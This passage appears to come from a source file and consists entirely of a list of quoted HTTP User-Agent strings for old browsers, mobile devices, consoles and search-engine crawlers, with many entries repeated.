'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Googlebot/2.1 (http://www.googlebot.com/bot.html)', 'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.1) Gecko/20061205 Iceweasel/2.0.0.1 (Debian-2.0.0.1+dfsg-2)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; FDM; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 1.1.4322)',
'Opera/10.00 (X11; Linux i686; U; en) Presto/2.2.0',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.13) Gecko/20101209 Firefox/3.6.13',
'Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 5.1; Trident/5.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)', 'Mozilla/4.0 (compatible; MSIE 6.0b; Windows 98)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.8) Gecko/20100804 Gentoo Firefox/3.6.8',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2.7) Gecko/20100809 Fedora/3.6.7-1.fc14 Firefox/3.6.7',
'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'YahooSeeker/1.2 (compatible; Mozilla 4.0; MSIE 5.5; yahooseeker at yahoo-inc dot com ; http://help.yahoo.com/help/us/shop/merchant/)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)',
'Mozilla/5.0 (compatible; MSIE 9.0; AOL 9.7; AOLBuild 4343.19; Windows NT 6.1; WOW64; Trident/5.0; FunWebProducts)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.27; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.21; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; GTB7.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.7; AOLBuild 4343.19; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C; .NET4.0E)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
'Mozilla/1.22 (compatible; Konqueror/4.3; Linux) KHTML/4.3.5 (like Gecko)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 6.5)',
'Opera/9.80 (Macintosh; U; de-de) Presto/2.8.131 Version/11.10',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.9) Gecko/20100318 Mandriva/2.0.4-69.1mib2010.0 SeaMonkey/2.0.4',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP) Gecko/20060706 IEMobile/7.0',
'Mozilla/5.0 (iPad; U; CPU OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B334b Safari/531.21.10',
'Mozilla/5.0 (Macintosh; I; Intel Mac OS X 10_6_7; ru-ru)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)',
'Mozilla/1.22 (compatible; MSIE 6.0; Windows NT 6.1; Trident/4.0; GTB6; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; OfficeLiveConnector.1.4; OfficeLivePatch.1.3)',
'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)',
'Mozilla/4.0 (Macintosh; U; Intel Mac OS X 10_6_7; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16',
'Mozilla/1.22 (X11; U; Linux x86_64; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.0.30729; InfoPath.2)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (compatible; MSIE 2.0; Windows CE; IEMobile 7.0)',
'Mozilla/4.0 (Macintosh; U; PPC Mac OS X; en-US)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7',
'BlackBerry8300/4.2.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/107 UP.Link/6.2.3.15.0',
'Mozilla/1.22 (compatible; MSIE 2.0; Windows 3.1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)',
'Mozilla/3.0 (Windows NT 6.1; ru-ru; rv:1.9.1.3.) Win32; x86 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Opera/7.0 (compatible; MSIE 2.0; Windows 3.1)',
'Opera/9.80 (Windows NT 5.1; U; en-US) Presto/2.8.131 Version/11.10',
'Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)',
'Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007',
'BlackBerry9000/5.0.0.93 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/179',
'Mozilla/5.0 (compatible; 008/0.83; http://www.80legs.com/webcrawler.html) Gecko/2008032620',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) AddSugarSpiderBot www.idealobserver.com',
'Mozilla/5.0 (compatible; AnyApexBot/1.0; +http://www.anyapex.com/bot.html)',
'Mozilla/4.0 (compatible; Arachmo)', 'Mozilla/4.0 (compatible; B-l-i-t-z-B-O-T)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)',
'Mozilla/5.0 (compatible; BecomeBot/2.3; MSIE 6.0 compatible; +http://www.become.com/site_owners.html)',
'BillyBobBot/1.0 (+http://www.billybobbot.com/crawler/)',
'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)',
'Sqworm/2.9.85-BETA (beta_release; 20011115-775; i686-pc-linux-gnu)',
'Mozilla/5.0 (compatible; YandexImages/3.0; +http://yandex.com/bots)',
'Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/5.0 (compatible; YodaoBot/1.0; http://www.yodao.com/help/webmaster/spider/; )',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 Dead Link Checker (wn.dlc@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/4.0 compatible ZyBorg/1.0 (wn-16.zyborg@looksmart.net; http://www.WISEnutbot.com)',
'Mozilla/5.0 (compatible; U; ABrowse 0.6; Syllable) AppleWebKit/420+ (KHTML, like Gecko)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser 1.98.744; .NET CLR 3.5.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; Acoo Browser; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; Avant Browser)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Acoo Browser; GTB6; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.1; .NET CLR 3.5.30729; .NET CLR 3.0.30618)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Acoo Browser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419 (KHTML, like Gecko, Safari/419.3) Cheshire/1.0.ALPHA',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.2 (KHTML, like Gecko) ChromePlus/4.0.222.3 Chrome/4.0.222.3 Safari/532.2',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 ChromePlus/1.5.1.1',
'Links (2.7; Linux 3.7.9-2-ARCH x86_64; GNU C 4.7.1; text)',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A',
'Mozilla/5.0 (PLAYSTATION 3; 3.55)', 'Mozilla/5.0 (PLAYSTATION 3; 2.00)',
'Mozilla/5.0 (PLAYSTATION 3; 1.00)',
'Mozilla/5.0 (Windows NT 6.3; WOW64; rv:24.0) Gecko/20100101 Thunderbird/24.4.0',
'Mozilla/5.0 (compatible; AbiLogicBot/1.0; +http://www.abilogic.com/bot.html)',
'SiteBar/3.3.8 (Bookmark Server; http://sitebar.org/)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'iTunes/9.0.3 (Macintosh; U; Intel Mac OS X 10_6_2; en-ca)',
'Mozilla/4.0 (compatible; WebCapture 3.0; Macintosh)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (FM Scene 4.6.1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 (.NET CLR 3.5.30729) (Prevx 3.0.5) ',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.8) Gecko/20071004 Iceweasel/2.0.0.8 (Debian-2.0.0.6+2.0.0.8-Oetch1)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; {1C69E7AA-C14E-200E-5A77-8EAB2D667A07})',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; acc=baadshah; acc=none; freenet DSL 1.1; (none))',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.51',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; snprtz|S26320700000083|2600#Service Pack 1#2#5#154321|isdn)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; mxie; .NET CLR 1.1.4322)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; ja-jp) AppleWebKit/417.9 (KHTML, like Gecko) Safari/417.8',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20051010 Firefox/1.0.7 (Ubuntu package 1.0.7)',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)',
'Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51',
'Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727)',
'Mozilla/5.0 (Windows; U; Windows NT 5.2; de-de; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)',
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1 (.NET CLR 3.0.04506.648)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)',
'Opera/9.60 (J2ME/MIDP; Opera Mini/4.2.14912/812; U; ru) Presto/2.4.15',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en-US) AppleWebKit/125.4 (KHTML, like Gecko, Safari) OmniWeb/v563.57',
'Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaN95_8GB/31.0.015; Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)',
'Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.8.0.5) Gecko/20060706 K-Meleon/1.0',
'Lynx/2.8.6rel.4 libwww-FM/2.14 SSL-MM/1.4.1 OpenSSL/0.9.8g',
'Mozilla/4.76 [en] (PalmOS; U; WebPro/3.0.1a; Palm-Arz1)',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/418 (KHTML, like Gecko) Shiira/1.2.2 Safari/125',
'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/2007072300 Iceweasel/2.0.0.6 (Debian-2.0.0.6-0etch1+lenny1)',
'Mozilla/5.0 (SymbianOS/9.1; U; en-us) AppleWebKit/413 (KHTML, like Gecko) Safari/413',
'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 3.5.30729; InfoPath.2)',
'Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)',
'Links (2.2; GNU/kFreeBSD 6.3-1-486 i686; 80x25)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; WOW64; Trident/4.0; SLCC1)',
